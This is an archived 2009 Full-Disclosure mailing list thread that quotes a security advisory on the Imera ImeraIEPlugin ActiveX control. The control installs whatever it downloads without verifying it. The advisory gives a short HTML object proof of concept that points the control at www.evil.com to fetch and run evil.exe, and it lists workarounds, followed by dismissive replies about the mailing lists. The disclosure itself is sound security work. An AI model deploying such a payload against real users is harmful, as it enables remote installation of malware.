| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <e1b25fd0903041059y7ba33c22h5a426fa28b06ab8e@mail.gmail.com>
Date: Wed, 4 Mar 2009 13:59:45 -0500
From: Jason Starks <jstarks440@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Imera ImeraIEPlugin ActiveX Control Remote
Code Execution
That is why most of them are submitted to bugtraq (ew), and not FD, where
they are often discredited in various ways. You see, bugtraq will reject 4
out of 7 postings if your not a subscriber to their super fun security
package, which offers lots of enjoyment of white hat and hacking zone-h
labs. On this ridiculus list, its hard not to get your post through! Kazaa!
On Wed, Mar 4, 2009 at 3:51 AM, bob jones <bholdaaa@...il.com> wrote:
> doesn't submitting lame bugs in useless apps ever get old?
>
> On Tue, Mar 3, 2009 at 9:12 AM, Elazar Broad <elazar@...hmail.com> wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> Who:
>> Imera(http://www.imera.com)
>> Imera TeamLinks Client(http://teamlinks.imera.com/install.html)
>>
>> What:
>> ImeraIEPlugin.dll
>> Version 1.0.2.54
>> Dated 12/02/2008
>> {75CC8584-86D4-4A50-B976-AA72618322C6}
>> http://teamlinks.imera.com/ImeraIEPlugin.cab
>>
>> How:
>> This control is used to install the Imera TeamLinks Client
>> package. The control fails to validate the content that it is to
>> download and install is indeed the Imera TeamLinks Client software.
>>
>> Exploiting this issue is quite simple, like so:
>>
>> <object classid="clsid:75CC8584-86D4-4A50-B976-AA72618322C6"
>> id="obj">
>> <param name="DownloadProtocol" value="http" />
>> <param name="DownloadHost" value="www.evil.com" />
>> <param name="DownloadPort" value="80" />
>> <param name="DownloadURI" value="evil.exe" />
>> </object>
>>
>> Fix:
>> The vendor has been notified.
>>
>> Workaround:
>> Set the killbit for the affected control, see
>> http://support.microsoft.com/kb/240797.
>> Use the Java installer for TeamLinks Client or install the software
>> manually from: http://teamlinks.imera.com/download.html
>>
>> Elazar
>> -----BEGIN PGP SIGNATURE-----
>> Charset: UTF8
>> Note: This signature can be verified at https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>> wpwEAQECAAYFAkmtR6YACgkQi04xwClgpZgbTgP/T3l+Gj+pIt19H80tiHrlbpbB7+qh
>> /03/vQYTEL75n0XCmfGjbcurLhWlo+m90eDQwlgigq3CoQyqleKNI8kSDYjr2pw289Pm
>> qC21ASe/P3zIM+gt81+iqDtKMA/MGvOE20nrHVEWlatAlCgmSjt3MJhqEJ/GdzUiR22s
>> BDrpVM8=
>> =R0h3
>> -----END PGP SIGNATURE-----
>>
>> --
>> Thinking of a life with religion? Click here to find a religious school
>> near you.
>>
>> http://tagline.hushmail.com/fc/BLSrjkqkOt2ULsSphoguIMPooi9T2eJVBhBNEJeyTxDH8nsQ8r6djRRztwU/
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists